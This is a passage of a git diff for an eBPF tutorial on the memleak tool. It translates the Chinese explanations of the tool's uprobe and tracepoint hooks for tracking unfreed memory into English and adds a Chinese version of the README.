If it is found, the element is deleted, and the `update_statistics_del` function is called to update the statistics data. Finally, if global tracking is enabled, a message is also output, including this address and its size. + +While tracking and profiling memory allocation, we also need to track kernel-mode memory allocation and deallocation. In the Linux kernel, the `kmem_cache_alloc` function and the `kfree` function are used for kernel-mode memory allocation and deallocation, respectively. ```c SEC("tracepoint/kmem/kfree") @@ -376,7 +335,7 @@ int memleak__kfree(void *ctx) } ``` -上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。 +The above code snippet defines a function `memleak__kfree`. This is a BPF program that will be executed when the `kfree` function is called in the kernel. First, the function checks if `kfree` exists. If it does, it reads the argument passed to the `kfree` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Otherwise, it reads the argument passed to the `kmem_free` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Then, the function calls the previously defined `gen_free_enter` function to handle the release of this memory block. ```c SEC("tracepoint/kmem/kmem_cache_alloc") @@ -391,22 +350,21 @@ int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) } ``` -这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。 +This code snippet defines a function `memleak__kmem_cache_alloc`. This is also a BPF program that will be executed when the `kmem_cache_alloc` function is called in the kernel. If the `wa_missing_free` flag is set, it calls the `gen_free_enter` function to handle possible missed release operations. Then, the function calls the `gen_alloc_enter` function to handle memory allocation and finally calls the `gen_alloc_exit2` function to record the allocation result. -这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。 +Both of these BPF programs use the `SEC` macro to define the corresponding tracepoints, so that they can be executed when the corresponding kernel functions are called. In the Linux kernel, a tracepoint is a static hook that can be inserted into the kernel to collect runtime kernel information. It is very useful for debugging and performance analysis. -在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。 +In the process of understanding this code, pay attention to the use of the `BPF_CORE_READ` macro. This macro is used to read kernel data in BPF programs. In BPF programs, we cannot directly access kernel memory and need to use such macros to safely read data. -### 用户态程序 +### User-Space Program -在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。 +After understanding the BPF kernel part, let's switch to the user-space program. The user-space program works closely with the BPF kernel program. It is responsible for loading BPF programs into the kernel, setting up and managing BPF maps, and handling data collected from BPF programs. 
The user-space program is longer; here we will only take a brief look at its attach points.

```c
int attach_uprobes(struct memleak_bpf *skel)
{
	ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter);
-	ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
-
+	ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
	ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter);
	ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit);
@@ -425,7 +383,7 @@ int attach_uprobes(struct memleak_bpf *skel)
	ATTACH_UPROBE_CHECKED(skel, free, free_enter);
	ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter);

-	// the following probes are intentinally allowed to fail attachment
+	// the following probes are intentionally allowed to fail attachment

	// deprecated in libc.so bionic
	ATTACH_UPROBE(skel, valloc, valloc_enter);
@@ -443,25 +401,27 @@ int attach_uprobes(struct memleak_bpf *skel)
}
```

-在这段代码中,我们看到一个名为`attach_uprobes`的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。
+In this code snippet, we see a function called `attach_uprobes` that attaches uprobes (user space probes) to the memory allocation and deallocation functions. In Linux, uprobes are a kernel mechanism that allows setting breakpoints at arbitrary locations in user space programs, enabling precise observation and control over the behavior of user space programs.

-这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。
+Here, each memory-related function is traced using two uprobes: one at the entry (enter) of the function and one at the exit. Thus, every time these functions are called or return, a uprobe event is triggered, which in turn triggers the corresponding BPF program.

-在具体的实现中,我们使用了`ATTACH_UPROBE`和`ATTACH_URETPROBE`两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。
+In the actual implementation, we use two macros, `ATTACH_UPROBE` and `ATTACH_URETPROBE`, to attach uprobes and uretprobes (function return probes), respectively. Each macro takes three arguments: the skeleton of the BPF program (skel), the name of the function to monitor, and the name of the BPF program to trigger.

-这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。
+These attach points cover the common memory allocation functions such as malloc, calloc, realloc, mmap, posix_memalign, memalign, and free, along with their corresponding exit points. Additionally, we also observe some possible allocation functions such as valloc, pvalloc, and aligned_alloc, although they may not always exist.

-这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。
+The goal of these attach points is to capture all possible memory allocation and deallocation events, allowing our memory leak detection tool to obtain as comprehensive data as possible. This approach enables us to track not only memory allocation and deallocation but also their contextual information, such as call stacks and invocation counts, helping us to pinpoint and fix memory leak issues.

-注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。
+Note that some memory allocation functions may not exist or may have been deprecated, such as valloc and pvalloc. Thus, their attachment may fail. In such cases, we allow for attachment failures, which do not prevent the program from executing.
This is because we are more focused on mainstream and commonly used memory allocation functions, while these deprecated functions are often used less frequently in practical applications. -完整的源代码: 关于如何安装依赖,请参考: +Complete source code: -## 编译运行 +Reference: + +## Compile and Run ```console $ make -$ sudo ./memleak +$ sudo ./memleak using default object: libc.so.6 using page size: 4096 tracing kernel: true @@ -478,12 +438,10 @@ Tracing outstanding memory allocs... Hit Ctrl-C to end ... ``` -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。 +Through this eBPF introductory tutorial, you have learned how to write a Memleak eBPF monitoring program to monitor memory leaks in real time. You have also learned about the application of eBPF in memory monitoring, how to write eBPF programs using the BPF API, create and use eBPF maps, and how to use eBPF tools to monitor and analyze memory leak issues. We have provided a detailed example to help you understand the execution flow and principles of eBPF code. -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository at or website for more examples and complete tutorials. -接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。 - -参考资料: +> The original link of this article: diff --git a/src/16-memleak/README.zh.md b/src/16-memleak/README.zh.md new file mode 100644 index 0000000..0dfb2f4 --- /dev/null +++ b/src/16-memleak/README.zh.md @@ -0,0 +1,489 @@ +# eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 + +eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。 + +## 背景及其重要性 + +内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。 + +内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。 + +### 调试内存泄漏的挑战 + +调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。 + +## eBPF 的作用 + +在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分 + +析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。 + +`memleak` eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,`memleak` 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令: + +```console +# ./memleak -p $(pidof allocs) +Attaching to pid 5193, Ctrl+C to quit. 
+[11:16:33] Top 2 stacks with outstanding allocations: + 80 bytes in 5 allocations from stack + main+0x6d [allocs] + __libc_start_main+0xf0 [libc-2.21.so] + +[11:16:34] Top 2 stacks with outstanding allocations: + 160 bytes in 10 allocations from stack + main+0x6d [allocs] + __libc_start_main+0xf0 [libc-2.21.so] +``` + +运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。 + +随着时间的推移,很显然,`allocs` 进程的 `main` 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。 + +## memleak 的实现原理 + +在基本层面上,`memleak` 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,`memleak` 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,`memleak` 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 `memleak` 能够准确地追踪到哪些内存块已被分配但未被释放。 + +对于用户态的常用内存分配函数,如 `malloc` 和 `calloc` 等,`memleak` 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +对于内核态的内存分配函数,如 `kmalloc` 等,`memleak` 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。 + +## 内核态 eBPF 程序实现 + +## `memleak` 内核态 eBPF 程序实现 + +`memleak` 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 `memleak` 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。 + +```c +#ifndef __MEMLEAK_H +#define __MEMLEAK_H + +#define ALLOCS_MAX_ENTRIES 1000000 +#define COMBINED_ALLOCS_MAX_ENTRIES 10240 + +struct alloc_info { + __u64 size; // 分配的内存大小 + __u64 timestamp_ns; // 分配时的时间戳,单位为纳秒 + int stack_id; // 分配时的调用堆栈ID +}; + +union combined_alloc_info { + struct { + __u64 total_size : 40; // 所有未释放分配的总大小 + __u64 number_of_allocs : 24; // 所有未释放分配的总次数 + }; + __u64 bits; // 结构的位图表示 +}; + +#endif /* __MEMLEAK_H */ +``` + +这里定义了两个主要的数据结构:`alloc_info` 和 `combined_alloc_info`。 + +`alloc_info` 结构体包含了一个内存分配的基本信息,包括分配的内存大小 `size`、分配发生时的时间戳 `timestamp_ns`,以及触发分配的调用堆栈 ID `stack_id`。 + +`combined_alloc_info` 是一个联合体(union),它包含一个嵌入的结构体和一个 `__u64` 类型的位图表示 `bits`。嵌入的结构体有两个成员:`total_size` 和 `number_of_allocs`,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。 + +接下来,`memleak` 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 `SEC(".maps")` 的形式定义,表示它们属于 eBPF 程序的映射部分。 + +```c +const volatile size_t min_size = 0; +const volatile size_t max_size = -1; +const volatile size_t page_size = 4096; +const volatile __u64 sample_rate = 1; +const volatile bool trace_all = false; +const volatile __u64 stack_flags = 0; +const volatile bool wa_missing_free = false; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, pid_t); + __type(value, u64); + __uint(max_entries, 10240); +} sizes SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); /* address */ + __type(value, struct alloc_info); + __uint(max_entries, ALLOCS_MAX_ENTRIES); +} allocs SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); /* stack id */ + __type(value, union combined_alloc_info); + __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES); +} combined_allocs SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); + __type(value, u64); + __uint(max_entries, 10240); +} memptrs SEC(".maps"); + +struct { + __uint(type, 
BPF_MAP_TYPE_STACK_TRACE); + __type(key, u32); +} stack_traces SEC(".maps"); + +static union combined_alloc_info initial_cinfo; +``` + +这段代码首先定义了一些可配置的参数,如 `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags` 和 `wa_missing_free`,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。 + +接着定义了五个映射: + +1. `sizes`:这是一个哈希类型的映射,键为进程 ID,值为 `u64` 类型,存储每个进程的分配大小。 +2. `allocs`:这也是一个哈希类型的映射,键为分配的地址,值为 `alloc_info` 结构体,存储每个内存分配的详细信息。 +3. `combined_allocs`:这是另一个哈希类型的映射,键为堆栈 ID,值为 `combined_alloc_info` 联合体,存储所有未释放分配的总大小和总次数。 +4. `memptrs`:这也是一个哈希类型的映射,键和值都为 `u64` 类型,用于在用户空间和内核空间之间传递内存指针。 +5. `stack_traces`:这是一个堆栈追踪类型的映射,键为 `u32` 类型,用于存储堆栈 ID。 + +以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 `malloc`, `free`, `calloc`, `realloc`, `mmap` 和 `munmap`,以便在调用这些函数时进行数据记录。在用户态,`memleak` 主要使用了 uprobes 技术进行挂载。 + +每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。 + +这里,`gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。 + +函数原型示例如下: + +```c +SEC("uprobe") +int BPF_KPROBE(malloc_enter, size_t size) +{ + // 记录分配开始的相关信息 + return gen_alloc_enter(size); +} + +SEC("uretprobe") +int BPF_KRETPROBE(malloc_exit) +{ + // 记录分配结束的相关信息 + return gen_alloc_exit(ctx); +} + +SEC("uprobe") +int BPF_KPROBE(free_enter, void *address) +{ + // 记录释放开始的相关信息 + return gen_free_enter(address); +} +``` + +其中,`malloc_enter` 和 `free_enter` 是分别挂载在 `malloc` 和 `free` 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 `malloc_exit` 则是挂载在 `malloc` 函数的返回处的探针,用于记录函数的返回值。 + +这些函数使用了 `BPF_KPROBE` 和 `BPF_KRETPROBE` 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。 + +`gen_alloc_enter` 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。 + +```c +static int gen_alloc_enter(size_t size) +{ + if (size < min_size || size > max_size) + return 0; + + if (sample_rate > 1) { + if (bpf_ktime_get_ns() % sample_rate != 0) + return 0; + } + + const pid_t pid = bpf_get_current_pid_tgid() >> 32; + bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY); + + if (trace_all) + bpf_printk("alloc entered, size = %lu\n", size); + + return 0; +} + +SEC("uprobe") +int BPF_KPROBE(malloc_enter, size_t size) +{ + return gen_alloc_enter(size); +} +``` + +首先,`gen_alloc_enter` 函数接收一个 `size` 参数,这个参数表示请求分配的内存的大小。如果这个值不在 `min_size` 和 `max_size` 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。 + +接下来,函数检查采样率 `sample_rate`。如果 `sample_rate` 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 `bpf_ktime_get_ns` 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。 + +之后,函数使用 `bpf_get_current_pid_tgid` 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。 + +函数接下来更新 `sizes` 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。`BPF_ANY` 表示如果 key 已存在,那么更新 value,否则就新建一个条目。 + +最后,如果启用了 `trace_all` 标志,函数将打印一条信息,说明发生了内存分配。 + +`BPF_KPROBE` 宏用于 + +最后定义了 `BPF_KPROBE(malloc_enter, size_t size)`,它会在 `malloc` 函数被调用时被 BPF uprobe 拦截执行,并通过 `gen_alloc_enter` 来记录内存分配大小。 +我们刚刚分析了内存分配的入口函数 `gen_alloc_enter`,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 `gen_alloc_exit2` 函数以及如何从内存分配调用中获取返回的内存地址。 + +```c +static int gen_alloc_exit2(void *ctx, u64 address) +{ + const pid_t pid = bpf_get_current_pid_tgid() >> 32; + struct alloc_info info; + + const u64* size = bpf_map_lookup_elem(&sizes, &pid); + if (!size) + return 0; // missed alloc entry + + __builtin_memset(&info, 0, sizeof(info)); + + info.size = *size; + bpf_map_delete_elem(&sizes, &pid); + + if (address != 0) { + info.timestamp_ns = bpf_ktime_get_ns(); + + info.stack_id = bpf_get_stackid(ctx, 
&stack_traces, stack_flags); + + bpf_map_update_elem(&allocs, &address, &info, BPF_ANY); + + update_statistics_add(info.stack_id, info.size); + } + + if (trace_all) { + bpf_printk("alloc exited, size = %lu, result = %lx\n", + info.size, address); + } + + return 0; +} +static int gen_alloc_exit(struct pt_regs *ctx) +{ + return gen_alloc_exit2(ctx, PT_REGS_RC(ctx)); +} + +SEC("uretprobe") +int BPF_KRETPROBE(malloc_exit) +{ + return gen_alloc_exit(ctx); +} +``` + +`gen_alloc_exit2` 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 `ctx`,另一个是内存分配函数返回的内存地址 `address`。 + +首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 `sizes` 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。 + +接着,函数清除 `info` 结构体的内容,并设置它的 `size` 字段为之前在 map 中找到的内存分配大小。并从 `sizes` 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。 + +接下来,如果 `address` 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 `info` 结构体中,并随后更新到 `allocs` 这个 map 中。 + +最后,函数调用 `update_statistics_add` 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。 + +请注意,`gen_alloc_exit` 函数是 `gen_alloc_exit2` 的一个包装,它将 `PT_REGS_RC(ctx)` 作为 `address` 参数传递给 `gen_alloc_exit2`。` +在我们的讨论中,我们刚刚提到在 `gen_alloc_exit2` 函数中,调用了 `update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。 + +```c +static void update_statistics_add(u64 stack_id, u64 sz) +{ + union combined_alloc_info *existing_cinfo; + + existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo); + if (!existing_cinfo) + return; + + const union combined_alloc_info incremental_cinfo = { + .total_size = sz, + .number_of_allocs = 1 + }; + + __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits); +} +``` + +`update_statistics_add` 函数接收两个参数:当前的堆栈 ID `stack_id` 以及内存分配的大小 `sz`。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。 + +首先,函数尝试在 `combined_allocs` 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 `initial_cinfo`(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。 + +接着,函数创建一个 `incremental_cinfo`,并设置它的 `total_size` 为当前内存分配的大小,设置 `number_of_allocs` 为 1。这是因为每次调用 `update_statistics_add` 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 `sz`。 + +最后,函数使用 `__sync_fetch_and_add` 函数原子地将 `incremental_cinfo` 的值加到 `existing_cinfo` 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 `update_statistics_add` 函数,每个内存分配事件也能正确地记录到统计数据中。 + +总的来说,`update_statistics_add` 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。 +在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 `update_statistics_del` 的函数,其作用是在内存释放时更新统计信息。而 `gen_free_enter` 函数则是在进程调用 `free` 函数时被执行。 + +```c +static void update_statistics_del(u64 stack_id, u64 sz) +{ + union combined_alloc_info *existing_cinfo; + + existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id); + if (!existing_cinfo) { + bpf_printk("failed to lookup combined allocs\n"); + return; + } + + const union combined_alloc_info decremental_cinfo = { + .total_size = sz, + .number_of_allocs = 1 + }; + + __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits); +} +``` + +`update_statistics_del` 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 `combined_allocs` 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 `combined_alloc_info` 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 `decremental_cinfo` 的 `combined_alloc_info` 结构体,设置它的 `total_size` 为要释放的内存大小,设置 `number_of_allocs` 为 1。然后使用 `__sync_fetch_and_sub` 函数原子地从 `existing_cinfo` 中减去 `decremental_cinfo` 的值。请注意,这里的 `number_of_allocs` 是负数,表示减少了一个内存分配。 + +```c +static int gen_free_enter(const void *address) +{ + const u64 addr = (u64)address; + + const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr); + if (!info) + return 0; + + bpf_map_delete_elem(&allocs, &addr); + update_statistics_del(info->stack_id, 
info->size); + + if (trace_all) { + bpf_printk("free entered, address = %lx, size = %lu\n", + address, info->size); + } + + return 0; +} + +SEC("uprobe") +int BPF_KPROBE(free_enter, void *address) +{ + return gen_free_enter(address); +} +``` + +接下来看 `gen_free_enter` 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 `allocs` 这个 map 中使用这个地址作为键来查找对应的 `alloc_info` 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 `update_statistics_del` 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。 +在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。 + +```c +SEC("tracepoint/kmem/kfree") +int memleak__kfree(void *ctx) +{ + const void *ptr; + + if (has_kfree()) { + struct trace_event_raw_kfree___x *args = ctx; + ptr = BPF_CORE_READ(args, ptr); + } else { + struct trace_event_raw_kmem_free___x *args = ctx; + ptr = BPF_CORE_READ(args, ptr); + } + + return gen_free_enter(ptr); +} +``` + +上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。 + +```c +SEC("tracepoint/kmem/kmem_cache_alloc") +int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) +{ + if (wa_missing_free) + gen_free_enter(ctx->ptr); + + gen_alloc_enter(ctx->bytes_alloc); + + return gen_alloc_exit2(ctx, (u64)(ctx->ptr)); +} +``` + +这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。 + +这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。 + +在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。 + +### 用户态程序 + +在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。 + +```c +int attach_uprobes(struct memleak_bpf *skel) +{ + ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); + ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); + + ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); + ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); + + ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); + ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); + + ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); + ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); + + ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, free, free_enter); + ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); + + // the following probes are intentinally allowed to fail attachment + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, valloc, valloc_enter); + ATTACH_URETPROBE(skel, valloc, valloc_exit); + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, pvalloc, 